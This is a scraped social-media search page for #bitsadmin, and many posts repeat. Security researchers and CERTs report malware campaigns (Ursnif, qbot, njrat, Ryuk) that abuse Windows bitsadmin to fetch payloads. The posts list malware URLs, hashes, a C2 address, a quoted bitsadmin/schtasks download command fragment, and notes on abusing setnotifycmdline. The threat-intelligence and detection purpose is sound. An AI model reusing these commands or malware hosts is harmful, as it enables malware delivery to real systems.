English
English Indonesia Türkçe Deutsch Español Português Pусский Français Italiano Nederlands Polski العربية ไทย Tiếng Việt 繁體中文 简体中文 日本語 한국어

#bitsadmin search results

DissectMalware's profile picture. Senior Security Engineer @Amazon. Ex Assistant Professor. Opinions are mine; not my employer's. DM is open. Author of xlmdeobfuscator and https://t.co/eh1fMHMADE
Malwrologist
@DissectMalware
Apr 10, 2018

#rtf document --> #bitsadmin command hxxp://tpreiastephenville.com/jazz.exe 729fdbb4b840234dc48fd13770d6811908aac73d3e76228a9aa02a8f776d9cbf

DissectMalware's tweet image. #rtf document --> #bitsadmin command hxxp://tpreiastephenville.com/jazz.exe 729fdbb4b840234dc48fd13770d6811908aac73d3e76228a9aa02a8f776d9cbf
3
8
21
0
0
InQuest's profile picture. InQuest mitigates end-user risk, reclaiming analyst time while maximizing security ROI with file-based security automation. Acquired by @OPSWAT.
InQuest
@InQuest
Apr 25, 2019

#VBScript utilizes #bitsadmin to dl #PE (seems to be #qbot) hxxp://proto.thriftyhealthyandhappy.com/scintillating.png hxxp://ank.tastywieners.com/ubiquitous.png hxxp://horse.tastywienersonwheels.com/nouveau-riche.png hxxp://old.oshkoshrugby.com/caustic.png url + ?bg=sp39&os=&av=

InQuest's tweet image. #VBScript utilizes #bitsadmin to dl #PE (seems to be #qbot) hxxp://proto.thriftyhealthyandhappy.com/scintillating.png hxxp://ank.tastywieners.com/ubiquitous.png hxxp://horse.tastywienersonwheels.com/nouveau-riche.png hxxp://old.oshkoshrugby.com/caustic.png url + ?bg=sp39&os=&av=
1
9
17
2
0
as_informatico's profile picture. Siempre aprendiendo... Únete a Hack Valencia @hackvlc27 Actual presidente de la Asociación de Hackers de Valencia. El que se aburre es porque quiere! 😉
🅰️s_informático
 @as_informatico
Jul 23, 2019

#Bitsadmin es una utilidad de transferencia en segundo plano incluido en Windows desde XP, facilita la transferencia asíncrona y acelerada de archivos que usan ancho de banda de red inactivo. Lo usan muchas apps como Chrome, Firefox, Windows Update y cientos de malwares...

as_informatico's tweet image. #Bitsadmin es una utilidad de transferencia en segundo plano incluido en Windows desde XP, facilita la transferencia asíncrona y acelerada de archivos que usan ancho de banda de red inactivo. Lo usan muchas apps como Chrome, Firefox, Windows Update y cientos de malwares...
0
9
26
0
0
bh4b3sh's profile picture. Cybersecurity Analyst | Detection Engineer | Threat Hunter #Microsoft365 #EntraID #Azure #Windows #AD #AWS #Kubernetes
Bhabesh
 @bh4b3sh
Jul 9, 2021

Working on a @sigma_hq rule for susp #bitsadmin download. Looks for - susp url - susp file ext - IP in url - susp download folder I have whitelisted what noise I had seen. Need help from the folks with SIEMs (@NathanMcNulty😉) to filter out some more FPs

bh4b3sh's tweet image. Working on a @sigma_hq rule for susp #bitsadmin download. Looks for - susp url - susp file ext - IP in url - susp download folder I have whitelisted what noise I had seen. Need help from the folks with SIEMs (@NathanMcNulty😉) to filter out some more FPs
3
4
34
10
0
DissectMalware's profile picture. Senior Security Engineer @Amazon. Ex Assistant Professor. Opinions are mine; not my employer's. DM is open. Author of xlmdeobfuscator and https://t.co/eh1fMHMADE
Malwrologist
@DissectMalware
Jan 18, 2021

#hta with plain #VBScript -> #bitsadmin (VT 3/58) 159355ff86aed19de50f3e78800f3749030f832521a93c2460a8dcca43d3c4e2 #njrat https[://filetransfer.io/data-package/yovW0lpr/download

DissectMalware's tweet image. #hta with plain #VBScript -> #bitsadmin (VT 3/58) 159355ff86aed19de50f3e78800f3749030f832521a93c2460a8dcca43d3c4e2 #njrat https[://filetransfer.io/data-package/yovW0lpr/download
1
13
21
2
0
DissectMalware's profile picture. Senior Security Engineer @Amazon. Ex Assistant Professor. Opinions are mine; not my employer's. DM is open. Author of xlmdeobfuscator and https://t.co/eh1fMHMADE
Malwrologist
@DissectMalware
Mar 27, 2018

#malware using #bitsadmin command to dl the malware. #rtf -> #ole object -> cmd (bitsadmin). Using #rtfobj to extract the ole file. hybrid-analysis.com/sample/107970e…

DissectMalware's tweet image. #malware using #bitsadmin command to dl the malware. #rtf -> #ole object -> cmd (bitsadmin). Using #rtfobj to extract the ole file. hybrid-analysis.com/sample/107970e…
DissectMalware's tweet image. #malware using #bitsadmin command to dl the malware. #rtf -> #ole object -> cmd (bitsadmin). Using #rtfobj to extract the ole file. hybrid-analysis.com/sample/107970e…
2
16
23
2
0
logisekict's profile picture. Stay one step ahead in the digital world with our professional Cyber security and IT Services
Logisek
@logisekict
Jul 7

📡 Abusing #bitsadmin for Covert Execution Bitsadmin, a deprecated but still-present Windows binary, was originally designed to manage file transfers in the background using the Background Intelligent Transfer Service (BITS). Despite its benign purpose, it can be abused as a…

logisekict's tweet image. 📡 Abusing #bitsadmin for Covert Execution Bitsadmin, a deprecated but still-present Windows binary, was originally designed to manage file transfers in the background using the Background Intelligent Transfer Service (BITS). Despite its benign purpose, it can be abused as a…
0
1
1
0
255
vikas891's profile picture. I do DF/IR @KrollWire GX-IH. GCIH. GCFA. Lethal Forensicator. DFIR Netwars Champion.
Vikas Singh
 @vikas891
Feb 17, 2020

#RYUK is active once again. Confirmed #Cobalt hosted on jomamba[.]best IP 95.179.219[.]169 | Interesting usage of #bitsadmin instead of vintage COPY commands. Worth auditing #BITS usage!

vikas891's tweet image. #RYUK is active once again. Confirmed #Cobalt hosted on jomamba[.]best IP 95.179.219[.]169 | Interesting usage of #bitsadmin instead of vintage COPY commands. Worth auditing #BITS usage!
VK_Intel's profile picture. Ethical Hacker | Reverse Engineer | CEO @AdvIntel | Malware Course Author "Zero2Hero" / "Zero2Automated" | Former .gov Cybercrime | Threat Seeker Award
Vitali Kremez
 @VK_Intel
Jul 26, 2019

I would also add that Ryuk is spread via the initial TrickBot installs through Powershell Empire and/or Cobalt Strike framework specifically. Emotet is not a "banking Trojan"; it had "banking malware" capabilities in ~2014 moving more into loader-as-a-service since.

VK_Intel's tweet image. I would also add that Ryuk is spread via the initial TrickBot installs through Powershell Empire and/or Cobalt Strike framework specifically. Emotet is not a "banking Trojan"; it had "banking malware" capabilities in ~2014 moving more into loader-as-a-service since.
3
6
32
0
0
2
32
81
11
0
AgidCert's profile picture. Profilo ufficiale del CERT dell'Agenzia per l'Italia Digitale | Official account of the CERT of the Agency for Digital Italy @AgidGov Telegram: https://t.co/VqkIRFY4s9
Cert AgID
 @AgidCert
Feb 7, 2023

Campagna 🇮🇹 #Ursnif a tema #AgenziaEntrate utilizza #bitsadmin 📬 Oggetto: "Commissione di vigilanza sul registro tributario" ⚔️ TTP: Email > Link > RAR > HTA > bitsadmin > DLL 💣 Disponibili gli #IoC 👇 🔗 cert-agid.gov.it/wp-content/upl… Telegram: t.me/certagid/432

AgidCert's tweet image. Campagna 🇮🇹 #Ursnif a tema #AgenziaEntrate utilizza #bitsadmin 📬 Oggetto: "Commissione di vigilanza sul registro tributario" ⚔️ TTP: Email > Link > RAR > HTA > bitsadmin > DLL 💣 Disponibili gli #IoC 👇 🔗 cert-agid.gov.it/wp-content/upl… Telegram: t.me/certagid/432
2
8
20
3
3K
IHackLabs's profile picture. ➡️ Providing Cybersecurity Training with Elite Virtual Labs. ➡️ CREST Approved Training Providers. ➡️ Part of @WayraUK @GCHQ & @NCSC Cyber Accelerator.
iHackLabs
 @IHackLabs
Mar 23, 2018

Ultima entrega del articulo sobre Post-explotación en #Windows escrito por nuestro colaborador @mikelcobas Obtención de recursos y uso de herramientas, servicios y #scripts. Uso de la herramienta #BITSADMIN bit.ly/2po104r

IHackLabs's tweet image. Ultima entrega del articulo sobre Post-explotación en #Windows escrito por nuestro colaborador @mikelcobas Obtención de recursos y uso de herramientas, servicios y #scripts. Uso de la herramienta #BITSADMIN bit.ly/2po104r
0
10
11
0
0
JAMESWT_WT's profile picture. #Independent #Malware #Hunter #CyberSecurity #InfoSec https://t.co/KCFBJcHHcW https://t.co/WODUKncjFy
JAMESWT
 @JAMESWT_WT
Feb 28, 2019

"Relazione di notifica atto" #ursnif #italy with #bitsadmin /transfer msd5 /priority foreground /bob.suzetrust.com/pagjory63.php and schtasks /create /st 16:05 /sc once /tn pUm /tr Samples (vbs and payload) app.any.run/tasks/fe425ac4… @CertPa @VirITeXplorer @SettiDavide89

JAMESWT_WT's tweet image. "Relazione di notifica atto" #ursnif #italy with #bitsadmin /transfer msd5 /priority foreground /bob.suzetrust.com/pagjory63.php and schtasks /create /st 16:05 /sc once /tn pUm /tr Samples (vbs and payload) app.any.run/tasks/fe425ac4… @CertPa @VirITeXplorer @SettiDavide89
2
7
17
1
0
DissectMalware's profile picture. Senior Security Engineer @Amazon. Ex Assistant Professor. Opinions are mine; not my employer's. DM is open. Author of xlmdeobfuscator and https://t.co/eh1fMHMADE
Malwrologist
@DissectMalware
Apr 26, 2018

Only #bitsadmin /transfer to dl files? Nay One can also create a #job (can be empty string) to dl files, even set #headers (#setcustomheaders), set a callback to run a command after completion (#setnotifycmdline)! working: hybrid-analysis.com/sample/84e3709… hybrid-analysis.com/sample/8f747aa…

DissectMalware's tweet image. Only #bitsadmin /transfer to dl files? Nay One can also create a #job (can be empty string) to dl files, even set #headers (#setcustomheaders), set a callback to run a command after completion (#setnotifycmdline)! working: hybrid-analysis.com/sample/84e3709… hybrid-analysis.com/sample/8f747aa…
1
3
21
2
0
SInetNews's profile picture. https://t.co/79qBNYYk01 Servizi Informatici offre ad #aziende e #PA servizi #ICT che vanno dall'assistenza alla realizzazione di progetti strutturati di innovazione tecnologica.
SI.net Servizi Informatici
 @SInetNews
Feb 7, 2023

AgidCert: Campagna 🇮🇹 #Ursnif a tema #AgenziaEntrate utilizza #bitsadmin 📬 Oggetto: "Commissione di vigilanza sul registro tributario" ⚔️ TTP: Email > Link > RAR > HTA > bitsadmin > DLL 💣 Disponibili gli #IoC 👇 🔗 cert-agid.gov.it/wp-content/upl… Telegr…

SInetNews's tweet image. AgidCert: Campagna 🇮🇹 #Ursnif a tema #AgenziaEntrate utilizza #bitsadmin 📬 Oggetto: "Commissione di vigilanza sul registro tributario" ⚔️ TTP: Email > Link > RAR > HTA > bitsadmin > DLL 💣 Disponibili gli #IoC 👇 🔗 cert-agid.gov.it/wp-content/upl… Telegr…
0
0
0
0
59
logisekict's profile picture. Stay one step ahead in the digital world with our professional Cyber security and IT Services
Logisek
@logisekict
Jul 7

📡 Abusing #bitsadmin for Covert Execution Bitsadmin, a deprecated but still-present Windows binary, was originally designed to manage file transfers in the background using the Background Intelligent Transfer Service (BITS). Despite its benign purpose, it can be abused as a…

logisekict's tweet image. 📡 Abusing #bitsadmin for Covert Execution Bitsadmin, a deprecated but still-present Windows binary, was originally designed to manage file transfers in the background using the Background Intelligent Transfer Service (BITS). Despite its benign purpose, it can be abused as a…
0
1
1
0
255
Osint10x_'s profile picture. At Osint10x, we provide: 📊 Curated threat feeds 🎙 Threat actor insights 🛠 Latest tools 🌐 Timely updates Buy me a Coffee: https://t.co/SUjFiZC3v7
Osint10x
 @Osint10x_
Dec 28

5/7 ✅ #BITSAdmin.exe: Used to create download or upload jobs, helping attackers transfer files stealthily. ✅ #InstallUtil.exe: Abused to execute arbitrary code during the installation of .NET applications without writing files to disk. #darkweb #CTI #Cybersecurity

1
0
0
0
47
fuzotech's profile picture. We talk privacy & tech hacks here; antivirus, browsers (Tor, Firefox, Brave), Windows 11, Linux secrets, & more. Follow for tutorials & security tips!
Fuzo Tech
 @fuzotech
Jul 7, 2023

📢 Hey everyone! 👋🏼 Ever wondered about Bitsadmin.exe and its purpose? 🖥️ Find out more: fuzotech.com/bitsadmin-exe/ 📚 Expand your knowledge and explore its functionalities! 🚀💻 #Bitsadmin #Windows #Tech #TechTips

0
0
0
0
7
xme's profile picture. Freelance | Blogger | SANS ISC Handler | FOR610/FOR710 Instructor | BruCON co-organizer | BlueTeam | DFIR | MTB | PGP: 0xEB583912514B3E1F | Tweets are mine!
Xavier Mertens @[email protected] 🇧🇪
 @xme
Apr 13, 2023

Using #bitsadmin for #C2 communications isn’t the stealthier way of working but… if it works! ;-) #Botconf2023

0
0
8
0
1K
SInetNews's profile picture. https://t.co/79qBNYYk01 Servizi Informatici offre ad #aziende e #PA servizi #ICT che vanno dall'assistenza alla realizzazione di progetti strutturati di innovazione tecnologica.
SI.net Servizi Informatici
 @SInetNews
Feb 7, 2023

AgidCert: Campagna 🇮🇹 #Ursnif a tema #AgenziaEntrate utilizza #bitsadmin 📬 Oggetto: "Commissione di vigilanza sul registro tributario" ⚔️ TTP: Email > Link > RAR > HTA > bitsadmin > DLL 💣 Disponibili gli #IoC 👇 🔗 cert-agid.gov.it/wp-content/upl… Telegr…

SInetNews's tweet image. AgidCert: Campagna 🇮🇹 #Ursnif a tema #AgenziaEntrate utilizza #bitsadmin 📬 Oggetto: "Commissione di vigilanza sul registro tributario" ⚔️ TTP: Email > Link > RAR > HTA > bitsadmin > DLL 💣 Disponibili gli #IoC 👇 🔗 cert-agid.gov.it/wp-content/upl… Telegr…
0
0
0
0
59
AgidCert's profile picture. Profilo ufficiale del CERT dell'Agenzia per l'Italia Digitale | Official account of the CERT of the Agency for Digital Italy @AgidGov Telegram: https://t.co/VqkIRFY4s9
Cert AgID
 @AgidCert
Feb 7, 2023

Campagna 🇮🇹 #Ursnif a tema #AgenziaEntrate utilizza #bitsadmin 📬 Oggetto: "Commissione di vigilanza sul registro tributario" ⚔️ TTP: Email > Link > RAR > HTA > bitsadmin > DLL 💣 Disponibili gli #IoC 👇 🔗 cert-agid.gov.it/wp-content/upl… Telegram: t.me/certagid/432

AgidCert's tweet image. Campagna 🇮🇹 #Ursnif a tema #AgenziaEntrate utilizza #bitsadmin 📬 Oggetto: "Commissione di vigilanza sul registro tributario" ⚔️ TTP: Email > Link > RAR > HTA > bitsadmin > DLL 💣 Disponibili gli #IoC 👇 🔗 cert-agid.gov.it/wp-content/upl… Telegram: t.me/certagid/432
2
8
20
3
3K
DissectMalware's profile picture. Senior Security Engineer @Amazon. Ex Assistant Professor. Opinions are mine; not my employer's. DM is open. Author of xlmdeobfuscator and https://t.co/eh1fMHMADE
Malwrologist
@DissectMalware
Jan 18, 2021

#hta with plain #VBScript -> #bitsadmin (VT 3/58) 159355ff86aed19de50f3e78800f3749030f832521a93c2460a8dcca43d3c4e2 #njrat https[://filetransfer.io/data-package/yovW0lpr/download

DissectMalware's tweet image. #hta with plain #VBScript -> #bitsadmin (VT 3/58) 159355ff86aed19de50f3e78800f3749030f832521a93c2460a8dcca43d3c4e2 #njrat https[://filetransfer.io/data-package/yovW0lpr/download
1
13
21
2
0
vikas891's profile picture. I do DF/IR @KrollWire GX-IH. GCIH. GCFA. Lethal Forensicator. DFIR Netwars Champion.
Vikas Singh
 @vikas891
Feb 17, 2020

#RYUK is active once again. Confirmed #Cobalt hosted on jomamba[.]best IP 95.179.219[.]169 | Interesting usage of #bitsadmin instead of vintage COPY commands. Worth auditing #BITS usage!

vikas891's tweet image. #RYUK is active once again. Confirmed #Cobalt hosted on jomamba[.]best IP 95.179.219[.]169 | Interesting usage of #bitsadmin instead of vintage COPY commands. Worth auditing #BITS usage!
VK_Intel's profile picture. Ethical Hacker | Reverse Engineer | CEO @AdvIntel | Malware Course Author "Zero2Hero" / "Zero2Automated" | Former .gov Cybercrime | Threat Seeker Award
Vitali Kremez
 @VK_Intel
Jul 26, 2019

I would also add that Ryuk is spread via the initial TrickBot installs through Powershell Empire and/or Cobalt Strike framework specifically. Emotet is not a "banking Trojan"; it had "banking malware" capabilities in ~2014 moving more into loader-as-a-service since.

VK_Intel's tweet image. I would also add that Ryuk is spread via the initial TrickBot installs through Powershell Empire and/or Cobalt Strike framework specifically. Emotet is not a "banking Trojan"; it had "banking malware" capabilities in ~2014 moving more into loader-as-a-service since.
3
6
32
0
0
2
32
81
11
0
DissectMalware's profile picture. Senior Security Engineer @Amazon. Ex Assistant Professor. Opinions are mine; not my employer's. DM is open. Author of xlmdeobfuscator and https://t.co/eh1fMHMADE
Malwrologist
@DissectMalware
Apr 10, 2018

#rtf document --> #bitsadmin command hxxp://tpreiastephenville.com/jazz.exe 729fdbb4b840234dc48fd13770d6811908aac73d3e76228a9aa02a8f776d9cbf

DissectMalware's tweet image. #rtf document --> #bitsadmin command hxxp://tpreiastephenville.com/jazz.exe 729fdbb4b840234dc48fd13770d6811908aac73d3e76228a9aa02a8f776d9cbf
3
8
21
0
0
InQuest's profile picture. InQuest mitigates end-user risk, reclaiming analyst time while maximizing security ROI with file-based security automation. Acquired by @OPSWAT.
InQuest
@InQuest
Apr 25, 2019

#VBScript utilizes #bitsadmin to dl #PE (seems to be #qbot) hxxp://proto.thriftyhealthyandhappy.com/scintillating.png hxxp://ank.tastywieners.com/ubiquitous.png hxxp://horse.tastywienersonwheels.com/nouveau-riche.png hxxp://old.oshkoshrugby.com/caustic.png url + ?bg=sp39&os=&av=

InQuest's tweet image. #VBScript utilizes #bitsadmin to dl #PE (seems to be #qbot) hxxp://proto.thriftyhealthyandhappy.com/scintillating.png hxxp://ank.tastywieners.com/ubiquitous.png hxxp://horse.tastywienersonwheels.com/nouveau-riche.png hxxp://old.oshkoshrugby.com/caustic.png url + ?bg=sp39&os=&av=
1
9
17
2
0
bh4b3sh's profile picture. Cybersecurity Analyst | Detection Engineer | Threat Hunter #Microsoft365 #EntraID #Azure #Windows #AD #AWS #Kubernetes
Bhabesh
 @bh4b3sh
Jul 9, 2021

Working on a @sigma_hq rule for susp #bitsadmin download. Looks for - susp url - susp file ext - IP in url - susp download folder I have whitelisted what noise I had seen. Need help from the folks with SIEMs (@NathanMcNulty😉) to filter out some more FPs

bh4b3sh's tweet image. Working on a @sigma_hq rule for susp #bitsadmin download. Looks for - susp url - susp file ext - IP in url - susp download folder I have whitelisted what noise I had seen. Need help from the folks with SIEMs (@NathanMcNulty😉) to filter out some more FPs
3
4
34
10
0
DissectMalware's profile picture. Senior Security Engineer @Amazon. Ex Assistant Professor. Opinions are mine; not my employer's. DM is open. Author of xlmdeobfuscator and https://t.co/eh1fMHMADE
Malwrologist
@DissectMalware
Jan 18, 2021

#hta with plain #VBScript -> #bitsadmin (VT 3/58) 159355ff86aed19de50f3e78800f3749030f832521a93c2460a8dcca43d3c4e2 #njrat https[://filetransfer.io/data-package/yovW0lpr/download

DissectMalware's tweet image. #hta with plain #VBScript -> #bitsadmin (VT 3/58) 159355ff86aed19de50f3e78800f3749030f832521a93c2460a8dcca43d3c4e2 #njrat https[://filetransfer.io/data-package/yovW0lpr/download
1
13
21
2
0
as_informatico's profile picture. Siempre aprendiendo... Únete a Hack Valencia @hackvlc27 Actual presidente de la Asociación de Hackers de Valencia. El que se aburre es porque quiere! 😉
🅰️s_informático
 @as_informatico
Jul 23, 2019

#Bitsadmin es una utilidad de transferencia en segundo plano incluido en Windows desde XP, facilita la transferencia asíncrona y acelerada de archivos que usan ancho de banda de red inactivo. Lo usan muchas apps como Chrome, Firefox, Windows Update y cientos de malwares...

as_informatico's tweet image. #Bitsadmin es una utilidad de transferencia en segundo plano incluido en Windows desde XP, facilita la transferencia asíncrona y acelerada de archivos que usan ancho de banda de red inactivo. Lo usan muchas apps como Chrome, Firefox, Windows Update y cientos de malwares...
0
9
26
0
0
JAMESWT_WT's profile picture. #Independent #Malware #Hunter #CyberSecurity #InfoSec https://t.co/KCFBJcHHcW https://t.co/WODUKncjFy
JAMESWT
 @JAMESWT_WT
Feb 28, 2019

"Relazione di notifica atto" #ursnif #italy with #bitsadmin /transfer msd5 /priority foreground /bob.suzetrust.com/pagjory63.php and schtasks /create /st 16:05 /sc once /tn pUm /tr Samples (vbs and payload) app.any.run/tasks/fe425ac4… @CertPa @VirITeXplorer @SettiDavide89

JAMESWT_WT's tweet image. "Relazione di notifica atto" #ursnif #italy with #bitsadmin /transfer msd5 /priority foreground /bob.suzetrust.com/pagjory63.php and schtasks /create /st 16:05 /sc once /tn pUm /tr Samples (vbs and payload) app.any.run/tasks/fe425ac4… @CertPa @VirITeXplorer @SettiDavide89
2
7
17
1
0
DissectMalware's profile picture. Senior Security Engineer @Amazon. Ex Assistant Professor. Opinions are mine; not my employer's. DM is open. Author of xlmdeobfuscator and https://t.co/eh1fMHMADE
Malwrologist
@DissectMalware
Mar 27, 2018

#malware using #bitsadmin command to dl the malware. #rtf -> #ole object -> cmd (bitsadmin). Using #rtfobj to extract the ole file. hybrid-analysis.com/sample/107970e…

DissectMalware's tweet image. #malware using #bitsadmin command to dl the malware. #rtf -> #ole object -> cmd (bitsadmin). Using #rtfobj to extract the ole file. hybrid-analysis.com/sample/107970e…
DissectMalware's tweet image. #malware using #bitsadmin command to dl the malware. #rtf -> #ole object -> cmd (bitsadmin). Using #rtfobj to extract the ole file. hybrid-analysis.com/sample/107970e…
2
16
23
2
0
AgidCert's profile picture. Profilo ufficiale del CERT dell'Agenzia per l'Italia Digitale | Official account of the CERT of the Agency for Digital Italy @AgidGov Telegram: https://t.co/VqkIRFY4s9
Cert AgID
 @AgidCert
Feb 7, 2023

Campagna 🇮🇹 #Ursnif a tema #AgenziaEntrate utilizza #bitsadmin 📬 Oggetto: "Commissione di vigilanza sul registro tributario" ⚔️ TTP: Email > Link > RAR > HTA > bitsadmin > DLL 💣 Disponibili gli #IoC 👇 🔗 cert-agid.gov.it/wp-content/upl… Telegram: t.me/certagid/432

AgidCert's tweet image. Campagna 🇮🇹 #Ursnif a tema #AgenziaEntrate utilizza #bitsadmin 📬 Oggetto: "Commissione di vigilanza sul registro tributario" ⚔️ TTP: Email > Link > RAR > HTA > bitsadmin > DLL 💣 Disponibili gli #IoC 👇 🔗 cert-agid.gov.it/wp-content/upl… Telegram: t.me/certagid/432
2
8
20
3
3K
IHackLabs's profile picture. ➡️ Providing Cybersecurity Training with Elite Virtual Labs. ➡️ CREST Approved Training Providers. ➡️ Part of @WayraUK @GCHQ & @NCSC Cyber Accelerator.
iHackLabs
 @IHackLabs
Mar 23, 2018

Ultima entrega del articulo sobre Post-explotación en #Windows escrito por nuestro colaborador @mikelcobas Obtención de recursos y uso de herramientas, servicios y #scripts. Uso de la herramienta #BITSADMIN bit.ly/2po104r

IHackLabs's tweet image. Ultima entrega del articulo sobre Post-explotación en #Windows escrito por nuestro colaborador @mikelcobas Obtención de recursos y uso de herramientas, servicios y #scripts. Uso de la herramienta #BITSADMIN bit.ly/2po104r
0
10
11
0
0
DissectMalware's profile picture. Senior Security Engineer @Amazon. Ex Assistant Professor. Opinions are mine; not my employer's. DM is open. Author of xlmdeobfuscator and https://t.co/eh1fMHMADE
Malwrologist
@DissectMalware
Apr 26, 2018

Only #bitsadmin /transfer to dl files? Nay One can also create a #job (can be empty string) to dl files, even set #headers (#setcustomheaders), set a callback to run a command after completion (#setnotifycmdline)! working: hybrid-analysis.com/sample/84e3709… hybrid-analysis.com/sample/8f747aa…

DissectMalware's tweet image. Only #bitsadmin /transfer to dl files? Nay One can also create a #job (can be empty string) to dl files, even set #headers (#setcustomheaders), set a callback to run a command after completion (#setnotifycmdline)! working: hybrid-analysis.com/sample/84e3709… hybrid-analysis.com/sample/8f747aa…
1
3
21
2
0
logisekict's profile picture. Stay one step ahead in the digital world with our professional Cyber security and IT Services
Logisek
@logisekict
Jul 7

📡 Abusing #bitsadmin for Covert Execution Bitsadmin, a deprecated but still-present Windows binary, was originally designed to manage file transfers in the background using the Background Intelligent Transfer Service (BITS). Despite its benign purpose, it can be abused as a…

logisekict's tweet image. 📡 Abusing #bitsadmin for Covert Execution Bitsadmin, a deprecated but still-present Windows binary, was originally designed to manage file transfers in the background using the Background Intelligent Transfer Service (BITS). Despite its benign purpose, it can be abused as a…
0
1
1
0
255
vikas891's profile picture. I do DF/IR @KrollWire GX-IH. GCIH. GCFA. Lethal Forensicator. DFIR Netwars Champion.
Vikas Singh
 @vikas891
Feb 17, 2020

#RYUK is active once again. Confirmed #Cobalt hosted on jomamba[.]best IP 95.179.219[.]169 | Interesting usage of #bitsadmin instead of vintage COPY commands. Worth auditing #BITS usage!

vikas891's tweet image. #RYUK is active once again. Confirmed #Cobalt hosted on jomamba[.]best IP 95.179.219[.]169 | Interesting usage of #bitsadmin instead of vintage COPY commands. Worth auditing #BITS usage!
VK_Intel's profile picture. Ethical Hacker | Reverse Engineer | CEO @AdvIntel | Malware Course Author "Zero2Hero" / "Zero2Automated" | Former .gov Cybercrime | Threat Seeker Award
Vitali Kremez
 @VK_Intel
Jul 26, 2019

I would also add that Ryuk is spread via the initial TrickBot installs through Powershell Empire and/or Cobalt Strike framework specifically. Emotet is not a "banking Trojan"; it had "banking malware" capabilities in ~2014 moving more into loader-as-a-service since.

VK_Intel's tweet image. I would also add that Ryuk is spread via the initial TrickBot installs through Powershell Empire and/or Cobalt Strike framework specifically. Emotet is not a "banking Trojan"; it had "banking malware" capabilities in ~2014 moving more into loader-as-a-service since.
3
6
32
0
0
2
32
81
11
0
SInetNews's profile picture. https://t.co/79qBNYYk01 Servizi Informatici offre ad #aziende e #PA servizi #ICT che vanno dall'assistenza alla realizzazione di progetti strutturati di innovazione tecnologica.
SI.net Servizi Informatici
 @SInetNews
Feb 7, 2023

AgidCert: Campagna 🇮🇹 #Ursnif a tema #AgenziaEntrate utilizza #bitsadmin 📬 Oggetto: "Commissione di vigilanza sul registro tributario" ⚔️ TTP: Email > Link > RAR > HTA > bitsadmin > DLL 💣 Disponibili gli #IoC 👇 🔗 cert-agid.gov.it/wp-content/upl… Telegr…

SInetNews's tweet image. AgidCert: Campagna 🇮🇹 #Ursnif a tema #AgenziaEntrate utilizza #bitsadmin 📬 Oggetto: "Commissione di vigilanza sul registro tributario" ⚔️ TTP: Email > Link > RAR > HTA > bitsadmin > DLL 💣 Disponibili gli #IoC 👇 🔗 cert-agid.gov.it/wp-content/upl… Telegr…
0
0
0
0
59

Something went wrong.


Something went wrong.


United States Trends